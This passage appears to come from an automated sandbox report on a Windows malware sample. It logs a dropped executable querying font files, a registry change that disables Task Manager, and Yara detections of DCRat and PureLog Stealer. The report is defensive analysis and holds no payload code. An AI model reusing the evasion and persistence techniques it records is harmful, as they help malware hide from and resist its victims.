                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeQueries volume information: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058B146 GetVersionExW,0_2_0058B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Lowering of HIPS / PFW / Operating System Security Settings

                                    barindex
                                    Disable Task Manager(disabletaskmgr)
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                                    Disables the Windows task manager (taskmgr)
                                    Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Agentcomponentbrokermonitordhcp.exe PID: 600, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7448, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: aXnWbWpBWYJmkhPMHrrUNM.exe PID: 7580, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 1znAXdPcM5.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.5714721.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.1znAXdPcM5.exe.6dd8721.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Agentcomponentbrokermonitordhcp.exe.b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe, type: DROPPED
